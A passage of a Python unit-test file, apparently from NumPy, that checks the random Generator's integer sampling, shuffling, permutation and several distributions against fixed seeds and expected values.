tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc(tgt, [tgt + is_open], size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], [tgt + is_open],
size=1000, endpoint=endpoint, dtype=dt),
tgt)
def test_rng_zero_and_extremes_array(self, endpoint):
size = 1000
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
tgt = ubnd - 1
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
def test_full_range(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_full_range_array(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self, endpoint):
# Don't use fixed seed
random = Generator(MT19937())
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd - endpoint, size=2 ** 16,
endpoint=endpoint, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint,
dtype=bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_scalar_array_equiv(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
size = 1000
random = Generator(MT19937(1234))
scalar = random.integers(lbnd, ubnd, size=size, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
scalar_array = random.integers([lbnd], [ubnd], size=size,
endpoint=endpoint, dtype=dt)
random = Generator(MT19937(1234))
array = random.integers([lbnd] * size, [ubnd] *
size, size=size, endpoint=endpoint, dtype=dt)
assert_array_equal(scalar, scalar_array)
assert_array_equal(scalar, array)
def test_repeatability(self, endpoint):
# We use a sha256 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '053594a9b82d656f967c54869bc6970aa0358cf94ad469c81478459c6a90eee3',
'int16': '54de9072b6ee9ff7f20b58329556a46a447a8a29d67db51201bf88baa6e4e5d4',
'int32': 'd3a0d5efb04542b25ac712e50d21f39ac30f312a5052e9bbb1ad3baa791ac84b',
'int64': '14e224389ac4580bfbdccb5697d6190b496f91227cf67df60989de3d546389b1',
'int8': '0e203226ff3fbbd1580f15da4621e5f7164d0d8d6b51696dd42d004ece2cbec1',
'uint16': '54de9072b6ee9ff7f20b58329556a46a447a8a29d67db51201bf88baa6e4e5d4',
'uint32': 'd3a0d5efb04542b25ac712e50d21f39ac30f312a5052e9bbb1ad3baa791ac84b',
'uint64': '14e224389ac4580bfbdccb5697d6190b496f91227cf67df60989de3d546389b1',
'uint8': '0e203226ff3fbbd1580f15da4621e5f7164d0d8d6b51696dd42d004ece2cbec1'}
for dt in self.itype[1:]:
random = Generator(MT19937(1234))
# view as little endian for hash
if sys.byteorder == 'little':
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt)
else:
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt).byteswap()
res = hashlib.sha256(val).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random = Generator(MT19937(1234))
val = random.integers(0, 2 - endpoint, size=1000, endpoint=endpoint,
dtype=bool).view(np.int8)
res = hashlib.sha256(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_repeatability_broadcasting(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min
ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# view as little endian for hash
random = Generator(MT19937(1234))
val = random.integers(lbnd, ubnd, size=1000, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, ubnd, endpoint=endpoint,
dtype=dt)
assert_array_equal(val, val_bc)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, [ubnd] * 1000,
endpoint=endpoint, dtype=dt)
assert_array_equal(val, val_bc)
@pytest.mark.parametrize(
'bound, expected',
[(2**32 - 1, np.array([517043486, 1364798665, 1733884389, 1353720612,
3769704066, 1170797179, 4108474671])),
(2**32, np.array([517043487, 1364798666, 1733884390, 1353720613,
3769704067, 1170797180, 4108474672])),
(2**32 + 1, np.array([517043487, 1733884390, 3769704068, 4108474673,
1831631863, 1215661561, 3869512430]))]
)
def test_repeatability_32bit_boundary(self, bound, expected):
for size in [None, len(expected)]:
random = Generator(MT19937(1234))
x = random.integers(bound, size=size)
assert_equal(x, expected if size is not None else expected[0])
def test_repeatability_32bit_boundary_broadcasting(self):
desired = np.array([[[1622936284, 3620788691, 1659384060],
[1417365545, 760222891, 1909653332],
[3788118662, 660249498, 4092002593]],
[[3625610153, 2979601262, 3844162757],
[ 685800658, 120261497, 2694012896],
[1207779440, 1586594375, 3854335050]],
[[3004074748, 2310761796, 3012642217],
[2067714190, 2786677879, 1363865881],
[ 791663441, 1867303284, 2169727960]],
[[1939603804, 1250951100, 298950036],
[1040128489, 3791912209, 3317053765],
[3155528714, 61360675, 2305155588]],
[[ 817688762, 1335621943, 3288952434],
[1770890872, 1102951817, 1957607470],
[3099996017, 798043451, 48334215]]])
for size in [None, (5, 3, 3)]:
random = Generator(MT19937(12345))
x = random.integers([[-1], [0], [1]],
[2**32 - 1, 2**32, 2**32 + 1],
size=size)
assert_array_equal(x, desired if size is not None else desired[0])
def test_int64_uint64_broadcast_exceptions(self, endpoint):
configs = {np.uint64: ((0, 2**65), (-1, 2**62), (10, 9), (0, 0)),
np.int64: ((0, 2**64), (-(2**64), 2**62), (10, 9), (0, 0),
(-2**63-1, -2**63-1))}
for dtype in configs:
for config in configs[dtype]:
low, high = config
high = high - endpoint
low_a = np.array([[low]*10])
high_a = np.array([high] * 10)
assert_raises(ValueError, random.integers, low, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_a,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high_a,
endpoint=endpoint, dtype=dtype)
low_o = np.array([[low]*10], dtype=object)
high_o = np.array([high] * 10, dtype=object)
assert_raises(ValueError, random.integers, low_o, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_o,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_o, high_o,
endpoint=endpoint, dtype=dtype)
def test_int64_uint64_corner_case(self, endpoint):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint)
# None of these function calls should
# generate a ValueError now.
actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert not hasattr(sample, 'dtype')
assert_equal(type(sample), dt)
def test_respect_dtype_array(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint,
dtype=dt)
assert_equal(sample.dtype, dt)
def test_zero_size(self, endpoint):
# See gh-7203
for dt in self.itype:
sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt)
assert sample.shape == (3, 0, 4)
assert sample.dtype == dt
assert self.rfunc(0, -10, 0, endpoint=endpoint,
dtype=dt).shape == (0,)
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape,
(3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
def test_error_byteorder(self):
other_byteord_dt = '<i4' if sys.byteorder == 'big' else '>i4'
with pytest.raises(ValueError):
random.integers(0, 200, size=10, dtype=other_byteord_dt)
# chi2max is the maximum acceptable chi-squared value.
@pytest.mark.slow
@pytest.mark.parametrize('sample_size,high,dtype,chi2max',
[(5000000, 5, np.int8, 125.0), # p-value ~4.6e-25
(5000000, 7, np.uint8, 150.0), # p-value ~7.7e-30
(10000000, 2500, np.int16, 3300.0), # p-value ~3.0e-25
(50000000, 5000, np.uint16, 6500.0), # p-value ~3.5e-25
])
def test_integers_small_dtype_chisquared(self, sample_size, high,
dtype, chi2max):
# Regression test for gh-14774.
samples = random.integers(high, size=sample_size, dtype=dtype)
values, counts = np.unique(samples, return_counts=True)
expected = sample_size / high
chi2 = ((counts - expected)**2 / expected).sum()
assert chi2 < chi2max
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_integers(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2))
desired = np.array([[-80, -56], [41, 37], [-83, -16]])
assert_array_equal(actual, desired)
def test_integers_masked(self):
# Test masked rejection sampling algorithm to generate array of
# uint32 in an interval.
random = Generator(MT19937(self.seed))
actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32)
desired = np.array([[9, 21], [70, 68], [8, 41]], dtype=np.uint32)
assert_array_equal(actual, desired)
def test_integers_closed(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2), endpoint=True)
desired = np.array([[-80, -56], [ 41, 38], [-83, -15]])
assert_array_equal(actual, desired)
def test_integers_max_int(self):
# Tests whether integers with closed=True can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
actual = random.integers(np.iinfo('l').max, np.iinfo('l').max,
endpoint=True)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.096999199829214, 0.707517457682192],
[0.084364834598269, 0.767731206553125],
[0.665069021359413, 0.715487190596693]])
assert_array_almost_equal(actual, desired, decimal=15)
random = Generator(MT19937(self.seed))
actual = random.random()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_random_float(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.0969992 , 0.70751746],
[0.08436483, 0.76773121],
[0.66506902, 0.71548719]])
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_float_scalar(self):
random = Generator(MT19937(self.seed))
actual = random.random(dtype=np.float32)
desired = 0.0969992
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_unsupported_type(self):
assert_raises(TypeError, random.random, dtype='int32')
def test_choice_uniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4)
desired = np.array([0, 0, 2, 2], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([0, 1, 0, 1], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False)
desired = np.array([2, 0, 3], dtype=np.int64)
assert_array_equal(actual, desired)
actual = random.choice(4, 4, replace=False, shuffle=False)
desired = np.arange(4, dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([0, 2, 3], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random = Generator(MT19937(self.seed))
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['a', 'a', 'c', 'c'])
assert_array_equal(actual, desired)
def test_choice_multidimensional_default_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
desired = np.array([[0, 1], [0, 1], [4, 5]])
assert_array_equal(actual, desired)
def test_choice_multidimensional_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
desired = np.array([[0], [2], [4], [6]])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random = Generator(MT19937(self.seed))
non_contig = random.choice(5, 3, p=p[::2])
random = Generator(MT19937(self.seed))
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_choice_return_type(self):
# gh 9867
p = np.ones(4) / 4.
actual = random.choice(4, 2)
assert actual.dtype == np.int64
actual = random.choice(4, 2, replace=False)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p, replace=False)
assert actual.dtype == np.int64
def test_choice_large_sample(self):
choice_hash = '4266599d12bfcfb815213303432341c06b4349f5455890446578877bb322e222'
random = Generator(MT19937(self.seed))
actual = random.choice(10000, 5000, replace=False)
if sys.byteorder != 'little':
actual = actual.byteswap()
res = hashlib.sha256(actual.view(np.int8)).hexdigest()
assert_(choice_hash == res)
def test_bytes(self):
random = Generator(MT19937(self.seed))
actual = random.bytes(10)
desired = b'\x86\xf0\xd4\x18\xe1\x81\t8%\xdd'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random = Generator(MT19937(self.seed))
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([4, 1, 9, 8, 0, 5, 3, 6, 2, 7])
assert_array_equal(actual, desired)
def test_shuffle_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=1)
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=-1)
assert_array_equal(actual, desired)
def test_shuffle_custom_axis_empty(self):
random = Generator(MT19937(self.seed))
desired = np.array([]).reshape((0, 6))
for axis in (0, 1):
actual = np.array([]).reshape((0, 6))
random.shuffle(actual, axis=axis)
assert_array_equal(actual, desired)
def test_shuffle_axis_nonsquare(self):
y1 = np.arange(20).reshape(2, 10)
y2 = y1.copy()
random = Generator(MT19937(self.seed))
random.shuffle(y1, axis=1)
random = Generator(MT19937(self.seed))
random.shuffle(y2.T)
assert_array_equal(y1, y2)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_shuffle_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.shuffle, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.shuffle, arr, 3)
assert_raises(TypeError, random.shuffle, arr, slice(1, 2, None))
arr = [[1, 2, 3], [4, 5, 6]]
assert_raises(NotImplementedError, random.shuffle, arr, 1)
arr = np.array(3)
assert_raises(TypeError, random.shuffle, arr)
arr = np.ones((3, 2))
assert_raises(np.AxisError, random.shuffle, arr, 2)
def test_permutation(self):
random = Generator(MT19937(self.seed))
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [4, 1, 9, 8, 0, 5, 3, 6, 2, 7]
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
bad_x_str = "abcd"
assert_raises(np.AxisError, random.permutation, bad_x_str)
bad_x_float = 1.2
assert_raises(np.AxisError, random.permutation, bad_x_float)
random = Generator(MT19937(self.seed))
integer_val = 10
desired = [3, 0, 8, 7, 9, 4, 2, 5, 1, 6]
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_permutation_custom_axis(self):
a = np.arange(16).reshape((4, 4))
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=1)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=-1)
assert_array_equal(actual, desired)
def test_permutation_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.permutation, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.permutation, arr, 3)
assert_raises(TypeError, random.permutation, arr, slice(1, 2, None))
@pytest.mark.parametrize("dtype", [int, object])
@pytest.mark.parametrize("axis, expected",
[(None, np.array([[3, 7, 0, 9, 10, 11],
[8, 4, 2, 5, 1, 6]])),
(0, np.array([[6, 1, 2, 9, 10, 11],
[0, 7, 8, 3, 4, 5]])),
(1, np.array([[ 5, 3, 4, 0, 2, 1],
[11, 9, 10, 6, 8, 7]]))])
def test_permuted(self, dtype, axis, expected):
random = Generator(MT19937(self.seed))
x = np.arange(12).reshape(2, 6).astype(dtype)
random.permuted(x, axis=axis, out=x)
assert_array_equal(x, expected)
random = Generator(MT19937(self.seed))
x = np.arange(12).reshape(2, 6).astype(dtype)
y = random.permuted(x, axis=axis)
assert y.dtype == dtype
assert_array_equal(y, expected)
def test_permuted_with_strides(self):
random = Generator(MT19937(self.seed))
x0 = np.arange(22).reshape(2, 11)
x1 = x0.copy()
x = x0[:, ::3]
y = random.permuted(x, axis=1, out=x)
expected = np.array([[0, 9, 3, 6],
[14, 20, 11, 17]])
assert_array_equal(y, expected)
x1[:, ::3] = expected
# Verify that the original x0 was modified in-place as expected.
assert_array_equal(x1, x0)
def test_permuted_empty(self):
y = random.permuted([])
assert_array_equal(y, [])
@pytest.mark.parametrize('outshape', [(2, 3), 5])
def test_permuted_out_with_wrong_shape(self, outshape):
a = np.array([1, 2, 3])
out = np.zeros(outshape, dtype=a.dtype)
with pytest.raises(ValueError, match='same shape'):
random.permuted(a, out=out)
def test_permuted_out_with_wrong_type(self):
out = np.zeros((3, 5), dtype=np.int32)
x = np.ones((3, 5))
with pytest.raises(TypeError, match='Cannot cast'):
random.permuted(x, axis=1, out=out)
def test_beta(self):
random = Generator(MT19937(self.seed))
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.083029353267698e-10, 2.449965303168024e-11],
[2.397085162969853e-02, 3.590779671820755e-08],
[2.830254190078299e-04, 1.744709918330393e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[42, 41],
[42, 48],
[44, 50]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456)
desired = 42
assert_array_equal(actual, desired)
def test_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[32.9850547060149, 39.0219480493301],
[56.2006134779419, 57.3474165711485],
[55.4243733880198, 55.4209797925213]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.5439892869558927, 0.45601071304410745],
[0.5588917345860708, 0.4411082654139292 ]],
[[0.5632074165063435, 0.43679258349365657],
[0.54862581112627, 0.45137418887373015]],
[[0.49961831357047226, 0.5003816864295278 ],
[0.52374806183482, 0.47625193816517997]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
# gh-15876
assert_raises(ValueError, random.dirichlet, [[5, 1]])
assert_raises(ValueError, random.dirichlet, [[5], [1]])
assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]])
assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]]))
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random = Generator(MT19937(self.seed))
non_contig = random.dirichlet(alpha, size=(3, 2))
random = Generator(MT19937(self.seed))
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_dirichlet_small_alpha(self):
eps = 1.0e-9 # 1.0e-10 -> runtime x 10; 1e-11 -> runtime x 200, etc.
alpha = eps * np.array([1., 1.0e-3])
random = Generator(MT19937(self.seed))
actual = random.dirichlet(alpha, size=(3, 2))
expected = np.array([
[[1., 0.],
[1., 0.]],
[[1., 0.],
[1., 0.]],
[[1., 0.],
[1., 0.]]
])
assert_array_almost_equal(actual, expected, decimal=15)
@pytest.mark.slow
def test_dirichlet_moderately_small_alpha(self):
# Use alpha.max() < 0.1 to trigger stick breaking code path
alpha = np.array([0.02, 0.04, 0.03])
exact_mean = alpha / alpha.sum()
random = Generator(MT19937(self.seed))
sample = random.dirichlet(alpha, size=20000000)
sample_mean = sample.mean(axis=0)
assert_allclose(sample_mean, exact_mean, rtol=1e-3)
def test_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[0.098845481066258, 1.560752510746964],
[0.075730916041636, 1.769098974710777],
[1.488602544592235, 2.49684815275751 ]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random = Generator(MT19937(self.seed))
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[0.461720027077085, 1.100441958872451],
[1.100337455217484, 0.91421736740018 ],
[0.500811891303113, 0.826802454552058]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random = Generator(MT19937(self.seed))
